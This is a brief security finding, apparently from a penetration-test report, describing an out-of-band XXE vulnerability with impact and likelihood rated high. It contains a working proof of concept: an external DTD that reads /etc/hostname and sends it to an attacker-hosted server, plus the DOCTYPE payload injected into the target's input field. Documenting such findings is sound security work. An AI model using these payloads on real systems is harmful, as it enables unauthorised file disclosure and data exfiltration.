V5 - Validation/Sanitization
OOB (Out of Band) XXE
POC
Create a payload.dtd file with the following content and host it on your server. <!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http:///?x=%file;'>">%eval;
In the vulnerable website, add the following to the input area: <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http:///payload.dtd"> %xxe;]>
Then check the web server access logs. Firstly, the XML parser will load the dtd file and then it will leak the hostname to the attacker:
Impact
High
Likelihood
High